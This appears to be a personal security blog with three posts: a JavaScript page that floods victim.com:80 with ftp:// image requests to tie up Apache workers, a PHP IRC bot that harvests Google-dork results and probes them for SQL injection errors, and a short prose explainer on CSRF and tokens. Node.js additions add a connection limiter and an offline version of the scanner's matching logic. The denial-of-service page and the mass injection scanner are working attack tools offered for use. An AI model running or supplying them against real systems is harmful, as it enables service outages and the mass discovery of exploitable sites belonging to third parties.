JavaScript Apache DDoS

Something quick to share with you before I forget it 🙂

<html><body>
<script>
       // Each Image object opens its own TCP connection to victim.com:80.
       for (var i = 0; i < 100; i++) {
             var img = new Image();
             // ftp:// sidesteps the browser's per-host HTTP connection cap;
             // the counter makes every URL distinct so the requests are
             // not coalesced into one.
             var url = 'ftp://victim.com:80/?'+i;
             img.src = url;
       }
</script>
</body></html>

I use ftp:// because most browsers cap HTTP at about 6 simultaneous connections per host, whereas ftp:// had no such cap at the time of writing. Each of those ftp: connections to port 80 then just sits there: the browser waits for an FTP banner that never comes while Apache waits for an HTTP request line that never comes, so every connection holds a worker until Apache's Timeout expires. (Current Chrome and Firefox have since dropped ftp: support entirely, so this particular trick no longer works in them.)

Be sensible about how you use it!

(Original attack demonstration on BlackHat 2013, Las Vegas)
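The counter-measure a server operator wants against this kind of flood is a per-source cap on open connections plus a short idle timeout, so a browser that parks a hundred silent sockets gets most of them refused and the rest dropped. The block below is an added example in plain Node.js, not code from the original post; the limits, addresses and the fake server wiring used to exercise it are assumptions made for the example, and `attachLimiter` shows how the same object would be hooked into a real `net`/`http` server's `'connection'` event.

```javascript
// Added example (not from the original post): a per-source concurrent
// connection cap of the kind that blunts the ftp:// flood above, the same
// idea as iptables connlimit or Apache's mod_qos, written in Node.js so it
// can be exercised offline. Limits and addresses below are made up.

class ConnectionLimiter {
  constructor(maxPerSource) {
    this.maxPerSource = maxPerSource;
    this.open = new Map(); // source address -> number of open connections
  }

  // Called on accept. Returns true if the connection may proceed, false if
  // this source already holds maxPerSource open connections.
  onConnect(source) {
    const n = this.open.get(source) || 0;
    if (n >= this.maxPerSource) return false;
    this.open.set(source, n + 1);
    return true;
  }

  // Called when an accepted connection closes (including on idle timeout).
  onClose(source) {
    const n = this.open.get(source) || 0;
    if (n <= 1) this.open.delete(source);
    else this.open.set(source, n - 1);
  }

  openCount(source) {
    return this.open.get(source) || 0;
  }
}

// Simulates the attack page: `burst` simultaneous connections from one
// browser, none of which ever sends a request line. Returns how many the
// limiter lets in and how many it refuses.
function simulateFlood(source, burst, limit) {
  const limiter = new ConnectionLimiter(limit);
  let accepted = 0;
  let refused = 0;
  for (let i = 0; i < burst; i++) {
    if (limiter.onConnect(source)) accepted++;
    else refused++;
  }
  return { accepted, refused, stillOpen: limiter.openCount(source) };
}

// Wiring for a Node TCP/HTTP server: refuse excess connections at once and
// drop any accepted connection that stays idle longer than idleMs, so an
// attacker has to keep reconnecting instead of parking sockets until the
// server's own timeout (the idle wait is exactly what the ftp: trick
// relies on). `server` needs only an on('connection') event; sockets need
// remoteAddress, destroy(), setTimeout() and on('close').
function attachLimiter(server, limiter, idleMs) {
  server.on('connection', (socket) => {
    const src = socket.remoteAddress;
    if (!limiter.onConnect(src)) {
      socket.destroy();
      return;
    }
    socket.setTimeout(idleMs, () => socket.destroy());
    socket.on('close', () => limiter.onClose(src));
  });
  return server;
}
```

With a limit of 20 per source, the 100-image page above gets 20 connections accepted and 80 refused immediately, and the 20 that got in are cut after `idleMs` instead of after Apache's default Timeout. Put the real limit well above what a legitimate browser opens to one host (a handful), and remember that many users behind one NAT share a source address.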

IRC Client – Website Vulnerability scanner

Hey guys,

This script can now only serve as a template for a PHP-based IRC client/bot; its vulnerability-scanning functions no longer work, since they scrape a Google results-page layout that has since changed.

This one comes from the Dark Ages of GRnet, enjoy 🙂

In any case I take no responsibility for how the script runs or for any errors that might pop up on your computer.

<?php

set_time_limit(0);

/**
 * @author Atlantean.
 */

//########################INFORMATION##################################

$server = "global.irc.gr";
$port = 6667;
$me = "php_scanner";
$channel = "#scripting";
$identify = "id";
$master = array("Atlantean");

//EDIT THIS
$max_results = 500; // maximum Google results //
$threads = 10; //URLS TO test IN the same time!!

//#####################################################################

$search = array("mysql_num_rows()", "mysql_fetch_rows()", "main(", "extract()",
    "mysql_result()", "Syntax Error", "You Have An error", "mysql error",
    "SQL ERROR", "Warning: ");
//###############################SERVER WRITE##########################

$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!socket_connect($socket, $server, $port))
{
    echo "\n[-]Unable To connect...\n\n\n";
    exit;
}

socket_write($socket, "USER php 127.0.0.1 PHP :PHP Bot\nNICK $me\nJOIN :$channel\n");


//###############################Encode The Dork#############################

function encodeDork($s)
{
    $tmp = "";
    for ($i = 0; $i < strlen($s); $i++)
    {
        $tmp .= "&#" . hexdec(bin2hex($s[$i])) . ";";
    }
    return urlencode($tmp);
}

//###############################cURL MULTI THREAD#############################

function ExecHandle(&$curlHandle)
{
    $flag = null;
    do
    {
        curl_multi_exec($curlHandle, $flag);
    } while ($flag > 0);
}


while ($read = socket_read($socket, 2048))
{
    $cmd = explode(" ", $read);
    // Sender nick from a ":nick!user@host COMMAND ..." prefix; server
    // lines such as "PING :token" carry no prefix, so default to ''.
    $nick = explode(':', $cmd[0]);
    $nick = isset($nick[1]) ? explode('!', $nick[1]) : array('');
    $nick = strtolower($nick[0]);

    switch (isset($cmd[1]) ? $cmd[1] : '')
    {
        case "KICK":
            if ($cmd[3] == $me)
            {
                socket_write($socket, "\nJOIN :" . $channel . "\n");
            }
            break;
        case "PRIVMSG":
            if (in_array($nick, $master))
            {
                switch (str_replace(array(chr(10), chr(13)), '', $cmd[3]))
                {
                    case ":!join":
                        socket_write($socket, "\nJOIN :" . $cmd[4] . "\n");
                        break;
                    case ":!exit":
                        exit(socket_write($socket, "\nQUIT :Connection Lost\n"));
                        break;
                    case ":!part":
                        socket_write($socket, "\nPART :" . $cmd[4] . "\n");
                        break;
                    case ":!sql":
                        if (!isset($cmd[4]))
                        {
                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
                                "12[-] Enter Dork!\r\n");
                        } else
                        {
                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
                                "12[+] SQL Vulnerabilty Scan Started ...\nPRIVMSG $channel :" . chr(3) . "4$nick " .
                                chr(3) . "12[+] Dork : $cmd[4] \r\n");

                            $vuln_array = array();

                            $google = "http://www.google.com/search?q=" . encodeDork($cmd[4]) . "&start=0";

                            $ch = curl_init($google);
                            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                            curl_setopt($ch, CURLOPT_HEADER, 0);
                            $ret = curl_exec($ch);
                            curl_close($ch);

                            if (stristr($ret, '302 Moved') !== false)
                            {
                                socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) . "12[-] Banned From Google!! \r\n");
                                break;
                            }

                            // Total result count from "of about <b>N</b>"; 0 if the page layout is not recognised.
                            preg_match_all("/of( about)* <b>([\d,]+)<\/b>/", $ret, $max);
                            $max = isset($max[2][0]) ? (int) str_replace(",", "", $max[2][0]) : 0;

                            $max = $max > $max_results ? $max_results : $max;
                            $i = 0;

                            while ($i < $max)
                            {

                                $ch = curl_init("http://www.google.com/search?q=" . encodeDork($cmd[4]) . "&start=" . $i);
                                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                                curl_setopt($ch, CURLOPT_HEADER, 0);
                                $ret = curl_exec($ch);

                                preg_match_all("/<h3 class=r><a href=\"(.*?)\"/", $ret, $links);

                                if (@$links[1])
                                {
                                    foreach ($links[1] as $l)
                                    {
                                        if (strpos($l, '=') !== false)
                                        {
                                            $url = explode('=', $l);
                                            $url = $url[0] . "='";
                                            if (!in_array($url, $vuln_array))
                                            {
                                                array_push($vuln_array, $url);
                                            }
                                        }
                                    }
                                }

                                curl_close($ch);
                                $i += 10; // Google serves 10 results per page (the old "$i++" branch left $i unchanged and never terminated)
                            }

                            $vuln_array = array_unique($vuln_array);
                            sort($vuln_array);

                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) . "12[+] Got " . count($vuln_array) . " Valid URLs! Injection Started...\r\n");

                            $p = 0;
                            $o = $threads;

                            $curlHandle = curl_multi_init();

                            do
                            {

                                $tmp = count($vuln_array);

                                for ($i = 0; $i < $threads && $i < $tmp; $i++)
                                {
                                    $cURL[$i] = curl_init($vuln_array[$i]);
                                    curl_setopt($cURL[$i], CURLOPT_URL, $vuln_array[$i]);
                                    curl_setopt($cURL[$i], CURLOPT_HEADER, 0);
                                    curl_setopt($cURL[$i], CURLOPT_RETURNTRANSFER, true);
                                    curl_multi_add_handle($curlHandle, $cURL[$i]);
                                }

                                ExecHandle($curlHandle);

                                for ($i = 0; $i < $threads && $i < $tmp; $i++)
                                {
                                    $source[$i] = curl_multi_getcontent($cURL[$i]);
                                }


                                for ($i = 0; $i < $threads && $i < $tmp; $i++)
                                {
                                    foreach ($search as $error)
                                    {
                                        if (stristr($source[$i], $error) !== false)
                                        {
                                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
                                                "12[+] Possible Bug Found: $vuln_array[$i]\n");
                                            $p++;
                                            break;
                                        }
                                    }
                                }


                                for ($i = 0; $i < $threads && $i < $tmp; $i++)
                                {
                                    curl_multi_remove_handle($curlHandle, $cURL[$i]);
                                    unset($vuln_array[$i]);
                                }
                                sort($vuln_array);

                                socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
                                    "12[+] Scanned $o...\r\n");
                                $o += $threads;

                                unset($source);
                                unset($cURL);

                            } while (count($vuln_array) > 0);

                            curl_multi_close($curlHandle);

                            unset($vuln_array);
                            unset($source);
                            unset($cURL);

                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) . "12[+] Done. $p Bugs Found.\r\n");
                        }
                        break;
                }
            }
            break;
    }

    if ($cmd[0] == "PING")
    {
        socket_write($socket, "PONG " . $cmd[1] . "\n");
    }
}
socket_close($socket);
?>
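The two pieces of the bot that do the actual scanning are the probe-URL construction (append a quote to a parameter) and the error-string match over the fetched page. The block below is an added example in Node.js, not the original PHP, that isolates those two steps so they can be run offline; the target URLs and the response bodies are constructed for the example, nothing here talks to Google or to any real site, and the probe builder deliberately goes further than the PHP (one probe per parameter, other parameters kept) rather than reproducing its `explode('=')` shortcut.

```javascript
// Added example (not from the original post): the scanner's probe-building
// and error-matching steps in Node.js. URLs and response bodies below are
// constructed for the example; nothing here performs any network request.

// The same error strings the PHP $search array looks for, compared
// case-insensitively as stristr() does.
const SQL_ERROR_SIGNATURES = [
  'mysql_num_rows()', 'mysql_fetch_rows()', 'main(', 'extract()',
  'mysql_result()', 'Syntax Error', 'You Have An error', 'mysql error',
  'SQL ERROR', 'Warning: ',
];

// One probe per query parameter: a single quote appended to that
// parameter's value, all other parameters left intact. (The PHP version
// keeps only the text before the first '=', so it probes one parameter
// with an empty value and discards the rest of the query string.)
function buildProbeUrls(urlString) {
  const original = new URL(urlString);
  const probes = [];
  for (const [name, value] of original.searchParams) {
    const probe = new URL(urlString);
    probe.searchParams.set(name, value + "'");
    probes.push(probe.toString());
  }
  return probes;
}

// Returns the first signature present in a response body, or null.
function findSqlError(body) {
  const haystack = body.toLowerCase();
  for (const sig of SQL_ERROR_SIGNATURES) {
    if (haystack.includes(sig.toLowerCase())) return sig;
  }
  return null;
}

// Runs the check over fetched (here: constructed) responses and returns
// the entries the bot would report as "Possible Bug Found".
function scanResponses(responses) {
  const hits = [];
  for (const { url, body } of responses) {
    const sig = findSqlError(body);
    if (sig !== null) hits.push({ url, signature: sig });
  }
  return hits;
}

// Constructed responses standing in for what curl_multi would have fetched.
const SAMPLE_RESPONSES = [
  { url: 'http://target.example/item.php?id=5%27&cat=3',
    body: 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version' },
  { url: 'http://target.example/item.php?id=5&cat=3%27',
    body: '<html><body><h1>Category 3</h1><p>No items.</p></body></html>' },
  { url: 'http://target.example/news.php?page=2%27',
    body: "Warning: include(pages/2'.php): failed to open stream in /var/www/news.php on line 12" },
];
```

Running `scanResponses(SAMPLE_RESPONSES)` flags the first and third entries. The third one shows the weakness of the `Warning: ` signature: it fires on any PHP warning, here a file-inclusion error rather than a database one, so every hit from this list still needs a manual look before it is called an SQL injection.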

CSRF attack

It's been a long time since I last blogged, but some things I took on were very time-consuming. Today we'll talk about CSRF.

CSRF? What is that?

CSRF stands for cross-site request forgery, and it almost always leads to bad, nasty things. An attacker's page makes your browser send a request to a site where you are already logged in, and because the browser attaches your session cookie automatically the site carries out the action as you: it can drain your bank account balance or change your settings on a website without your consent, and usually without you knowing about it until it's too late.

However, if a website has taken precautions against this type of attack, such as per-session one-time CSRF tokens, the attack is neutralised: the attacker's page cannot read the token (the same-origin policy stops it from reading the victim's pages on the target site), so the forged request arrives without a valid token and the web server rejects it.

For more details one good article I spotted is on: https://www.acunetix.com/websitesecurity/csrf-attacks/

Aimilios